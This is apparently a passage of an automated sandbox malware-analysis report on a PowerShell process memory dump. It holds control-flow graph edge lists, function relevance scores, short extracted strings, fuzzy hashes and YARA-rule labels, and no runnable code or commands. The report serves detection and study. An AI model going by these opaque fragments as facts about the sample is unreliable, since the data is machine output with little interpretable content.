6f8d2cb-6f8d32f 757->764 762 6f8d2b2-6f8d2b5 758->762 763 6f8d2b7-6f8d2c4 758->763 765 6f8d2c6 762->765 763->765 764->715 765->764 767->715 772 6f8cfab 768->772 773 6f8cf83-6f8cf8f 768->773 777 6f8cfb1-6f8cfc4 772->777 774 6f8cf99-6f8cf9f 773->774 775 6f8cf91-6f8cf97 773->775 780 6f8cfa9 774->780 775->780 777->767 781 6f8cfca-6f8cfd5 777->781 780->777 784 6f8cfff 781->784 785 6f8cfd7-6f8cfe3 781->785 789 6f8d005-6f8d018 784->789 787 6f8cfed-6f8cff3 785->787 788 6f8cfe5-6f8cfeb 785->788 792 6f8cffd 787->792 788->792 789->767 790 6f8d01e-6f8d070 789->790 799 6f8d09a 790->799 800 6f8d072-6f8d07e 790->800 792->789 803 6f8d0a0-6f8d0eb 799->803 801 6f8d088-6f8d08e 800->801 802 6f8d080-6f8d086 800->802 804 6f8d098 801->804 802->804 803->767 809 6f8d0f1-6f8d10c 803->809 804->803 811 6f8d10e-6f8d114 809->811 812 6f8d126-6f8d1ca 809->812 813 6f8d118-6f8d124 811->813 814 6f8d116 811->814 812->767 823 6f8d1cc-6f8d1e5 812->823 813->812 814->812 825 6f8d1ef 823->825 825->715
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$4']q$4pl$x.dk
                                                        • API String ID: 0-2610102465
                                                        • Opcode ID: 08c2cc1dbee1ae10184593f504e4e571e06c80db05ccaa3431fe39004b8524ae
                                                        • Instruction ID: 64b60fb442004fd752a88fb019ef74c4022af3844cb7de9320326ffcfae76a50
                                                        • Opcode Fuzzy Hash: 08c2cc1dbee1ae10184593f504e4e571e06c80db05ccaa3431fe39004b8524ae
                                                        • Instruction Fuzzy Hash: B1120974A00214CFDBA4DB14CD91BAAB7B2BF85300F1581D5D909AB395CB72EE85CFA1
                                                        Function 06F8CAAB Relevance: 5.3, Strings: 4, Instructions: 331COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 826 6f8caab-6f8cc7a 829 6f8cca9-6f8ccb6 826->829 830 6f8cc7c-6f8cca1 826->830 831 6f8ccbc-6f8ccc4 829->831 832 6f8d372-6f8d3b7 829->832 830->829 833 6f8ccdc-6f8ccf4 831->833 834 6f8ccc6-6f8cccc 831->834 856 6f8d3bc-6f8d3d6 832->856 833->832 838 6f8ccfa-6f8cd0e 833->838 836 6f8ccce 834->836 837 6f8ccd0-6f8ccda 834->837 836->833 837->833 840 6f8cd3a 838->840 841 6f8cd10-6f8cd1c 838->841 846 6f8cd40-6f8cdbc 840->846 844 6f8cd1e-6f8cd24 841->844 845 6f8cd26-6f8cd36 841->845 847 6f8cd38 844->847 845->847 861 6f8cdbe-6f8cdca 846->861 862 6f8cde6 846->862 847->846 857 6f8d3d8-6f8d3fd 856->857 858 6f8d405-6f8d440 856->858 857->858 872 6f8d441 858->872 865 6f8cdcc-6f8cdd2 861->865 866 6f8cdd4-6f8cdda 861->866 867 6f8cdec-6f8ce43 862->867 868 6f8cde4 865->868 866->868 873 6f8ce72-6f8ce7f 867->873 874 6f8ce45-6f8ce6a 867->874 868->867 872->872 873->832 875 6f8ce85-6f8ce90 873->875 874->873 877 6f8ce92-6f8ce9b 875->877 878 6f8ceb3 875->878 880 6f8ce9d-6f8cea0 877->880 881 6f8cea2-6f8ceaf 877->881 879 6f8ceb6-6f8ceea 878->879 886 6f8d23e-6f8d258 879->886 887 6f8cef0-6f8cf0a 879->887 882 6f8ceb1 880->882 881->882 882->879 890 6f8d25a-6f8d27f 886->890 891 6f8d287-6f8d294 886->891 888 6f8cf39-6f8cf70 887->888 889 6f8cf0c-6f8cf31 887->889 905 6f8d1f4-6f8d239 888->905 906 6f8cf76-6f8cf81 888->906 889->888 890->891 892 6f8d29a-6f8d2a5 891->892 893 6f8d334-6f8d370 891->893 895 6f8d2c8 892->895 896 6f8d2a7-6f8d2b0 892->896 893->856 902 6f8d2cb-6f8d32f 895->902 900 6f8d2b2-6f8d2b5 896->900 901 6f8d2b7-6f8d2c4 896->901 903 6f8d2c6 900->903 901->903 902->856 903->902 905->856 910 6f8cfab 906->910 911 6f8cf83-6f8cf8f 906->911 915 6f8cfb1-6f8cfc4 910->915 912 6f8cf99-6f8cf9f 911->912 913 6f8cf91-6f8cf97 911->913 918 6f8cfa9 912->918 913->918 915->905 919 6f8cfca-6f8cfd5 915->919 918->915 922 6f8cfff 919->922 923 6f8cfd7-6f8cfe3 919->923 927 6f8d005-6f8d018 922->927 925 6f8cfed-6f8cff3 923->925 926 6f8cfe5-6f8cfeb 923->926 930 6f8cffd 925->930 926->930 927->905 928 6f8d01e-6f8d070 927->928 937 6f8d09a 928->937 938 6f8d072-6f8d07e 928->938 930->927 941 6f8d0a0-6f8d0eb 937->941 939 6f8d088-6f8d08e 938->939 940 6f8d080-6f8d086 938->940 942 6f8d098 939->942 940->942 941->905 947 6f8d0f1-6f8d10c 941->947 942->941 949 6f8d10e-6f8d114 947->949 950 6f8d126-6f8d1ca 947->950 951 6f8d118-6f8d124 949->951 952 6f8d116 949->952 950->905 961 6f8d1cc-6f8d1cf 950->961 951->950 952->950 962 6f8d1d9-6f8d1e5 961->962 963 6f8d1ef 962->963 963->856
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (fsl$4']q$4pl$x.dk
                                                        • API String ID: 0-2610102465
                                                        • Opcode ID: c78df1522613817e1914370e8d2c12b22d65b5d163874d71f121ab8c74549cd2
                                                        • Instruction ID: 7ee22588e5c5656a454f3af2df9a03de3e3363911764b704d605f714825e9989
                                                        • Opcode Fuzzy Hash: c78df1522613817e1914370e8d2c12b22d65b5d163874d71f121ab8c74549cd2
                                                        • Instruction Fuzzy Hash: 6DE11A74A00214CFEBA4DB14CD51BAAB7B2BF85300F1481D5D509AB395CB72EE85CFA1
                                                        Function 06F86F0A Relevance: 4.4, Strings: 3, Instructions: 647COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 964 6f86f0a-6f86f20 965 6f8701a-6f87056 964->965 966 6f86f26-6f86f2b 964->966 988 6f86700 965->988 989 6f86707-6f86728 965->989 967 6f86f2d-6f86f33 966->967 968 6f86f43-6f86f80 966->968 969 6f86f35 967->969 970 6f86f37-6f86f41 967->970 968->965 974 6f86f86-6f86f8d 968->974 969->968 970->968 976 6f86f8f-6f86f95 974->976 977 6f86fa5-6f8700c 974->977 978 6f86f99-6f86fa3 976->978 979 6f86f97 976->979 977->965 999 6f8705b-6f87133 977->999 978->977 979->977 988->989 990 6f86a4a-6f86a6b 988->990 991 6f86881-6f868a2 988->991 992 6f8672a-6f8674f 989->992 993 6f86757-6f86764 989->993 997 6f86a9a-6f86b3a 990->997 998 6f86a6d-6f86a92 990->998 995 6f868d1-6f868de 991->995 996 6f868a4-6f868c9 991->996 992->993 993->965 1000 6f8676a-6f8678b 993->1000 995->965 1001 6f868e4-6f8695e 995->1001 996->995 1053 6f86e8d-6f86eb5 997->1053 1054 6f86b40-6f86b7d 997->1054 998->997 1004 6f87162-6f8716f 999->1004 1005 6f87135-6f8715a 999->1005 1000->965 1013 6f86791-6f8687a 1000->1013 1001->965 1041 6f86964-6f869b0 1001->1041 1010 6f8727d-6f8728b 1004->1010 1011 6f87175-6f8717a 1004->1011 1005->1004 1015 6f8717c-6f87182 1011->1015 1016 6f87192-6f871a4 1011->1016 1013->991 1019 6f87184 1015->1019 1020 6f87186-6f87190 1015->1020 1016->1010 1022 6f871aa-6f871b5 1016->1022 1019->1016 1020->1016 1024 6f871cd-6f8725c 1022->1024 1025 6f871b7-6f871bd 1022->1025 1024->1010 1030 6f871bf 1025->1030 1031 6f871c1-6f871cb 1025->1031 1030->1024 1031->1024 1041->965 1052 6f869b6-6f86a43 1041->1052 1052->990 1072 6f86eba-6f86f07 1053->1072 1054->1053 1065 6f86b83-6f86ba4 1054->1065 1069 6f86bbe-6f86bc0 1065->1069 1070 6f86ba6-6f86bac 1065->1070 1075 6f86bda-6f86c02 1069->1075 1076 6f86bc2-6f86bc8 1069->1076 1073 6f86bae 1070->1073 1074 6f86bb0-6f86bbc 1070->1074 1072->965 1073->1069 1074->1069 1075->1053 1088 6f86c08-6f86c0d 1075->1088 1079 6f86bca 1076->1079 1080 6f86bcc-6f86bd8 1076->1080 1079->1075 1080->1075 1089 6f86c0f-6f86c15 1088->1089 1090 6f86c25-6f86c38 1088->1090 1092 6f86c19-6f86c23 1089->1092 1093 6f86c17 1089->1093 1090->1053 1094 6f86c3e-6f86c43 1090->1094 1092->1090 1093->1090 1095 6f86c5b-6f86c98 1094->1095 1096 6f86c45-6f86c4b 1094->1096 1095->1053 1101 6f86c9e-6f86ca9 1095->1101 1098 6f86c4d 1096->1098 1099 6f86c4f-6f86c59 1096->1099 1098->1095 1099->1095 1103 6f86cab-6f86cb1 1101->1103 1104 6f86cc1-6f86d99 1101->1104 1105 6f86cb3 1103->1105 1106 6f86cb5-6f86cbf 1103->1106 1104->1053 1117 6f86d9f-6f86dc6 1104->1117 1105->1104 1106->1104 1120 6f86dc8-6f86dce 1117->1120 1121 6f86de0-6f86e25 1117->1121 1122 6f86dd0 1120->1122 1123 6f86dd2-6f86dde 1120->1123 1121->1053 1128 6f86e27-6f86e42 1121->1128 1122->1121 1123->1121 1130 6f86e4c-6f86e5e 1128->1130 1131 6f86e68-6f86e8b 1130->1131 1131->1072
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$x.dk$-dk
                                                        • API String ID: 0-3850510335
                                                        • Opcode ID: 246d59de6ca86514dd3a2d32204231358f97c0ffcce7335fcf6b98b72c1dfe3e
                                                        • Instruction ID: 2bbd1783a5342ae5a4e00a927aec758f454e2327228affc1167cfc121f1a2658
                                                        • Opcode Fuzzy Hash: 246d59de6ca86514dd3a2d32204231358f97c0ffcce7335fcf6b98b72c1dfe3e
                                                        • Instruction Fuzzy Hash: 2B526C74B002148FD794DF18C991BAABBB2EB85304F15D0D5DA0D9B392CB72ED85CBA1
                                                        Function 06F86477 Relevance: 4.4, Strings: 3, Instructions: 630COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1134 6f86477-6f864a7 1136 6f8727d-6f8728b 1134->1136 1137 6f864ad-6f864b5 1134->1137 1138 6f864d6 1137->1138 1139 6f864b7-6f864c0 1137->1139 1143 6f864d9-6f864e6 1138->1143 1140 6f864c2-6f864c5 1139->1140 1141 6f864c7-6f864ca 1139->1141 1144 6f864d4 1140->1144 1141->1144 1143->1136 1145 6f864ec-6f864f4 1143->1145 1144->1143 1146 6f86515 1145->1146 1147 6f864f6-6f864ff 1145->1147 1150 6f86518-6f86525 1146->1150 1148 6f86501-6f86504 1147->1148 1149 6f86506-6f86509 1147->1149 1152 6f86513 1148->1152 1149->1152 1150->1136 1151 6f8652b-6f86533 1150->1151 1153 6f86554 1151->1153 1154 6f86535-6f8653e 1151->1154 1152->1150 1157 6f86557-6f8656a 1153->1157 1155 6f86540-6f86543 1154->1155 1156 6f86545-6f86548 1154->1156 1158 6f86552 1155->1158 1156->1158 1157->1136 1159 6f86570-6f86575 1157->1159 1158->1157 1160 6f8658d-6f865b1 1159->1160 1161 6f86577-6f8657d 1159->1161 1164 6f865e3-6f865f0 1160->1164 1165 6f865b3-6f865e0 1160->1165 1162 6f8657f 1161->1162 1163 6f86581-6f8658b 1161->1163 1162->1160 1163->1160 1164->1136 1166 6f865f6-6f865fb 1164->1166 1165->1164 1168 6f865fd-6f86603 1166->1168 1169 6f86613-6f8664a 1166->1169 1171 6f86605 1168->1171 1172 6f86607-6f86611 1168->1172 1169->1136 1176 6f86650-6f86658 1169->1176 1171->1169 1172->1169 1177 6f8665a-6f86660 1176->1177 1178 6f86670-6f866c6 1176->1178 1179 6f86662 1177->1179 1180 6f86664-6f8666e 1177->1180 1186 6f866cc-6f866ef 1178->1186 1187 6f87261-6f8726d 1178->1187 1179->1178 1180->1178 1190 6f866f2-6f866fe 1186->1190 1191 6f86700 1190->1191 1192 6f86707-6f86728 1190->1192 1191->1192 1193 6f86a4a-6f86a6b 1191->1193 1194 6f86881-6f868a2 1191->1194 1195 6f8672a-6f8674f 1192->1195 1196 6f86757-6f86764 1192->1196 1199 6f86a9a-6f86b3a 1193->1199 1200 6f86a6d-6f86a92 1193->1200 1197 6f868d1-6f868de 1194->1197 1198 6f868a4-6f868c9 1194->1198 1195->1196 1201 6f8701a-6f87056 1196->1201 1202 6f8676a-6f8678b 1196->1202 1197->1201 1203 6f868e4-6f8695e 1197->1203 1198->1197 1237 6f86e8d-6f86eb5 1199->1237 1238 6f86b40-6f86b7d 1199->1238 1200->1199 1201->1190 1202->1201 1211 6f86791-6f8687a 1202->1211 1203->1201 1228 6f86964-6f869b0 1203->1228 1211->1194 1228->1201 1236 6f869b6-6f86a43 1228->1236 1236->1193 1255 6f86eba-6f86f07 1237->1255 1238->1237 1248 6f86b83-6f86ba4 1238->1248 1252 6f86bbe-6f86bc0 1248->1252 1253 6f86ba6-6f86bac 1248->1253 1258 6f86bda-6f86c02 1252->1258 1259 6f86bc2-6f86bc8 1252->1259 1256 6f86bae 1253->1256 1257 6f86bb0-6f86bbc 1253->1257 1255->1201 1256->1252 1257->1252 1258->1237 1271 6f86c08-6f86c0d 1258->1271 1262 6f86bca 1259->1262 1263 6f86bcc-6f86bd8 1259->1263 1262->1258 1263->1258 1272 6f86c0f-6f86c15 1271->1272 1273 6f86c25-6f86c38 1271->1273 1275 6f86c19-6f86c23 1272->1275 1276 6f86c17 1272->1276 1273->1237 1277 6f86c3e-6f86c43 1273->1277 1275->1273 1276->1273 1278 6f86c5b-6f86c98 1277->1278 1279 6f86c45-6f86c4b 1277->1279 1278->1237 1284 6f86c9e-6f86ca9 1278->1284 1281 6f86c4d 1279->1281 1282 6f86c4f-6f86c59 1279->1282 1281->1278 1282->1278 1286 6f86cab-6f86cb1 1284->1286 1287 6f86cc1-6f86d99 1284->1287 1288 6f86cb3 1286->1288 1289 6f86cb5-6f86cbf 1286->1289 1287->1237 1300 6f86d9f-6f86dc6 1287->1300 1288->1287 1289->1287 1303 6f86dc8-6f86dce 1300->1303 1304 6f86de0-6f86e25 1300->1304 1305 6f86dd0 1303->1305 1306 6f86dd2-6f86dde 1303->1306 1304->1237 1311 6f86e27-6f86e42 1304->1311 1305->1304 1306->1304 1313 6f86e4c-6f86e5e 1311->1313 1314 6f86e68-6f86e8b 1313->1314 1314->1255
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$x.dk$-dk
                                                        • API String ID: 0-3850510335
                                                        • Opcode ID: f1cd40783b1d7ae8e7085b70bbf6fdc7aac11c750dccee41bd6e4501e7d8ee56
                                                        • Instruction ID: 437655d9a08ff18916155d7b1a02a6a32aff9d14a9326a60d08ad91506c9478e
                                                        • Opcode Fuzzy Hash: f1cd40783b1d7ae8e7085b70bbf6fdc7aac11c750dccee41bd6e4501e7d8ee56
                                                        • Instruction Fuzzy Hash: 9D425A74E002148FD794DF58C981BAABBB2EB85304F15D0D5E9099F392CB72ED85CBA1
                                                        Function 06F8C93B Relevance: 4.4, Strings: 3, Instructions: 621COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$x.dk$-dk
                                                        • API String ID: 0-3850510335
                                                        • Opcode ID: 76b6a4fdf65cbe67b787619b845d8f9e9ed8be5c8bf58814cda26b4f30c6b0fc
                                                        • Instruction ID: 8239cb1ce9543ec403dbe2f5d79991358eace36d54302dbf90ec03e0e7e484de
                                                        • Opcode Fuzzy Hash: 76b6a4fdf65cbe67b787619b845d8f9e9ed8be5c8bf58814cda26b4f30c6b0fc
                                                        • Instruction Fuzzy Hash: 3F424074B502149FD754DB18CD91BAABBB2EB86300F1580D5D909AF391CB72EE81CFA1
                                                        Function 06F87026 Relevance: 4.2, Strings: 3, Instructions: 483COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1593 6f87026-6f87039 1594 6f87043-6f87056 1593->1594 1598 6f86700 1594->1598 1599 6f86707-6f86728 1594->1599 1598->1599 1600 6f86a4a-6f86a6b 1598->1600 1601 6f86881-6f868a2 1598->1601 1602 6f8672a-6f8674f 1599->1602 1603 6f86757-6f86764 1599->1603 1606 6f86a9a-6f86b3a 1600->1606 1607 6f86a6d-6f86a92 1600->1607 1604 6f868d1-6f868de 1601->1604 1605 6f868a4-6f868c9 1601->1605 1602->1603 1608 6f8701a-6f87039 1603->1608 1609 6f8676a-6f8678b 1603->1609 1604->1608 1610 6f868e4-6f8695e 1604->1610 1605->1604 1641 6f86e8d-6f86eb5 1606->1641 1642 6f86b40-6f86b7d 1606->1642 1607->1606 1608->1594 1609->1608 1618 6f86791-6f8687a 1609->1618 1610->1608 1632 6f86964-6f869b0 1610->1632 1618->1601 1632->1608 1640 6f869b6-6f86a43 1632->1640 1640->1600 1659 6f86eba-6f86f07 1641->1659 1642->1641 1652 6f86b83-6f86ba4 1642->1652 1656 6f86bbe-6f86bc0 1652->1656 1657 6f86ba6-6f86bac 1652->1657 1662 6f86bda-6f86c02 1656->1662 1663 6f86bc2-6f86bc8 1656->1663 1660 6f86bae 1657->1660 1661 6f86bb0-6f86bbc 1657->1661 1659->1608 1660->1656 1661->1656 1662->1641 1675 6f86c08-6f86c0d 1662->1675 1666 6f86bca 1663->1666 1667 6f86bcc-6f86bd8 1663->1667 1666->1662 1667->1662 1676 6f86c0f-6f86c15 1675->1676 1677 6f86c25-6f86c38 1675->1677 1679 6f86c19-6f86c23 1676->1679 1680 6f86c17 1676->1680 1677->1641 1681 6f86c3e-6f86c43 1677->1681 1679->1677 1680->1677 1682 6f86c5b-6f86c98 1681->1682 1683 6f86c45-6f86c4b 1681->1683 1682->1641 1688 6f86c9e-6f86ca9 1682->1688 1685 6f86c4d 1683->1685 1686 6f86c4f-6f86c59 1683->1686 1685->1682 1686->1682 1690 6f86cab-6f86cb1 1688->1690 1691 6f86cc1-6f86d99 1688->1691 1692 6f86cb3 1690->1692 1693 6f86cb5-6f86cbf 1690->1693 1691->1641 1704 6f86d9f-6f86dc6 1691->1704 1692->1691 1693->1691 1707 6f86dc8-6f86dce 1704->1707 1708 6f86de0-6f86e25 1704->1708 1709 6f86dd0 1707->1709 1710 6f86dd2-6f86dde 1707->1710 1708->1641 1715 6f86e27-6f86e5e 1708->1715 1709->1708 1710->1708 1718 6f86e68-6f86e8b 1715->1718 1718->1659
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$x.dk$-dk
                                                        • API String ID: 0-3850510335
                                                        • Opcode ID: 2645321f182d962d5fdf9e5fd808ff76124d7c2f6d40a12fbfe435919a83efbd
                                                        • Instruction ID: 8d8d328a701c93912ceedc0dd690eaf0a89356c6c99934618ffaa7cec8abf05a
                                                        • Opcode Fuzzy Hash: 2645321f182d962d5fdf9e5fd808ff76124d7c2f6d40a12fbfe435919a83efbd
                                                        • Instruction Fuzzy Hash: FB226B74B002148FD794DF18C991BAABBB2EB85304F15D0D4DA0D9B392CB72ED85CBA1
                                                        Function 06F8CA2D Relevance: 4.2, Strings: 3, Instructions: 466COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1721 6f8ca2d-6f8ca45 1722 6f8ca4f-6f8ca65 1721->1722 1726 6f8c19c 1722->1726 1727 6f8c1a3-6f8c1c4 1722->1727 1726->1727 1728 6f8c31d-6f8c33e 1726->1728 1729 6f8c4e6-6f8c507 1726->1729 1730 6f8c1f3-6f8c200 1727->1730 1731 6f8c1c6-6f8c1eb 1727->1731 1736 6f8c36d-6f8c37a 1728->1736 1737 6f8c340-6f8c365 1728->1737 1732 6f8c509-6f8c52e 1729->1732 1733 6f8c536-6f8c618 1729->1733 1734 6f8ca20-6f8ca45 1730->1734 1735 6f8c206-6f8c227 1730->1735 1731->1730 1732->1733 1778 6f8c8bb-6f8c8e6 1733->1778 1779 6f8c61e-6f8c633 1733->1779 1734->1722 1735->1734 1746 6f8c22d-6f8c316 1735->1746 1736->1734 1738 6f8c380-6f8c3e8 call 6f856c6 1736->1738 1737->1736 1759 6f8c3ea-6f8c3fa 1738->1759 1746->1728 1759->1734 1761 6f8c400-6f8c446 1759->1761 1761->1734 1768 6f8c44c-6f8c4df 1761->1768 1768->1729 1794 6f8c8eb-6f8c938 1778->1794 1783 6f8c64d-6f8c675 1779->1783 1784 6f8c635-6f8c63b 1779->1784 1783->1778 1795 6f8c67b-6f8c69b 1783->1795 1787 6f8c63d 1784->1787 1788 6f8c63f-6f8c64b 1784->1788 1787->1783 1788->1783 1794->1734 1795->1778 1799 6f8c6a1-6f8c6f1 1795->1799 1799->1778 1804 6f8c6f7-6f8c804 1799->1804 1804->1778 1817 6f8c80a-6f8c853 1804->1817 1817->1778 1822 6f8c855-6f8c88c 1817->1822 1825 6f8c896-6f8c8b9 1822->1825 1825->1794
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4']q$x.dk$-dk
                                                        • API String ID: 0-3850510335
                                                        • Opcode ID: 03f10842e98ff423218238f1ae4052a5b5a82738fc4ecebdf351680cf758877c
                                                        • Instruction ID: f2a7b4200bff719134f95182d82e3f3dcd3b2e7ebe42fc4c515e85106b3931a1
                                                        • Opcode Fuzzy Hash: 03f10842e98ff423218238f1ae4052a5b5a82738fc4ecebdf351680cf758877c
                                                        • Instruction Fuzzy Hash: EF124F70B502149FD754DB18CD91BAABBB2EB86300F1590D5D909AF391CB72EE81CFA1
                                                        Function 06F856C6 Relevance: 4.1, Strings: 3, Instructions: 391COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1829 6f856c6 1830 6f856ca-6f856d0 1829->1830 1831 6f856e8-6f856f4 1830->1831 1832 6f856d2-6f856d7 1830->1832 1842 6f856fa-6f856fd 1831->1842 1843 6f85822-6f8582c 1831->1843 1833 6f856d8 1832->1833 1834 6f8574e-6f85757 1832->1834 1838 6f856d9-6f856da 1833->1838 1839 6f856dc-6f856e0 1833->1839 1835 6f85758-6f85761 1834->1835 1836 6f8576a 1834->1836 1840 6f85772-6f85776 1835->1840 1841 6f85762-6f85768 1835->1841 1844 6f8576c-6f8576e 1836->1844 1838->1831 1839->1830 1845 6f856e1-6f856e6 1839->1845 1849 6f85778-6f8577e 1840->1849 1850 6f85790-6f8579b 1840->1850 1841->1844 1842->1843 1846 6f85703-6f8570a 1842->1846 1847 6f8583a-6f85840 1843->1847 1848 6f8582e-6f85837 1843->1848 1844->1840 1844->1843 1845->1831 1851 6f85878-6f858cc 1846->1851 1852 6f85710-6f85715 1846->1852 1853 6f85842-6f85844 1847->1853 1854 6f85846-6f85852 1847->1854 1855 6f85780 1849->1855 1856 6f85782-6f8578e 1849->1856 1857 6f857aa 1850->1857 1858 6f8579d-6f857a0 1850->1858 1880 6f858eb 1851->1880 1881 6f858ce-6f858e9 1851->1881 1860 6f8572d-6f85731 1852->1860 1861 6f85717-6f8571d 1852->1861 1862 6f85854-6f85875 1853->1862 1854->1862 1855->1850 1856->1850 1869 6f857b4-6f8581f 1857->1869 1858->1857 1860->1843 1868 6f85737-6f85739 1860->1868 1864 6f8571f 1861->1864 1865 6f85721-6f8572b 1861->1865 1864->1860 1865->1860 1870 6f85749 1868->1870 1871 6f8573b-6f85747 1868->1871 1876 6f8574b-6f8574d 1870->1876 1871->1876 1876->1834 1876->1843 1882 6f858ed-6f858ef 1880->1882 1881->1882 1884 6f859d0-6f859da 1882->1884 1885 6f858f5-6f858f7 1882->1885 1886 6f859dc-6f859e3 1884->1886 1887 6f859e6-6f859ec 1884->1887 1888 6f858f9-6f85905 1885->1888 1889 6f85907 1885->1889 1892 6f859ee-6f859f0 1887->1892 1893 6f859f2-6f859f4 1887->1893 1890 6f85909-6f8590b 1888->1890 1889->1890 1890->1884 1894 6f85911-6f85915 1890->1894 1895 6f85a00-6f85a0e 1892->1895 1896 6f859f5-6f859fe 1893->1896 1897 6f85928 1894->1897 1898 6f85917-6f85926 1894->1898 1904 6f85a18-6f85a1f 1895->1904 1905 6f85a10-6f85a15 1895->1905 1896->1895 1900 6f8592a-6f8592c 1897->1900 1898->1900 1900->1884 1902 6f85932-6f85967 1900->1902 1910 6f85969-6f8596c 1902->1910 1911 6f85976-6f85991 1902->1911 1905->1904 1910->1911 1913 6f8599f-6f859a4 1911->1913 1914 6f85993-6f85995 1911->1914 1915 6f859a8-6f859ab 1913->1915 1916 6f859a6 1913->1916 1914->1913 1917 6f859ad-6f859cd 1915->1917 1918 6f85a22-6f85a3c 1915->1918 1916->1915 1918->1896 1921 6f85a3e-6f85a84 1918->1921 1925 6f85aa3 1921->1925 1926 6f85a86-6f85aa1 1921->1926 1927 6f85aa5-6f85aa7 1925->1927 1926->1927 1929 6f85b9c-6f85ba6 1927->1929 1930 6f85aad-6f85aaf 1927->1930 1933 6f85ba8-6f85bb1 1929->1933 1934 6f85bb4-6f85bba 1929->1934 1931 6f85abf 1930->1931 1932 6f85ab1-6f85abd 1930->1932 1936 6f85ac1-6f85ac3 1931->1936 1932->1936 1937 6f85bbc-6f85bbe 1934->1937 1938 6f85bc0-6f85bcc 1934->1938 1936->1929 1940 6f85ac9-6f85b07 1936->1940 1939 6f85bce-6f85bec 1937->1939 1938->1939 1948 6f85b09-6f85b0b 1940->1948 1949 6f85b15-6f85b1a 1940->1949 1948->1949 1950 6f85b1c 1949->1950 1951 6f85b1f-6f85b2e 1949->1951 1950->1951 1953 6f85b3c-6f85b82 1951->1953 1954 6f85b30-6f85b3a 1951->1954 1961 6f85b89 1953->1961 1962 6f85b84 1953->1962 1955 6f85b90-6f85b99 1954->1955 1961->1955 1962->1961
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2699146996.0000000006F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F80000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6f80000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $]q$$]q$$]q
                                                        • API String ID: 0-182748909
                                                        • Opcode ID: 54dbb7d6160cdafbeff1caf740d73cb905326b5926b69a1d79d5a6087d625454
                                                        • Instruction ID: a7bd26be4d5a71efcdea82bfcf4bd0bbbece8c2a3c65ddc79cf1540407580c52
                                                        • Opcode Fuzzy Hash: 54dbb7d6160cdafbeff1caf740d73cb905326b5926b69a1d79d5a6087d625454
                                                        • Instruction Fuzzy Hash: 03D16B72F04345CFCB99AF7888906AA7FE5AF81220B1484EAD845CB296DB35CD41C7A1
                                                        Function 06F83E00 Relevance: 3.9, Strings: 3, Instructions: 124COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
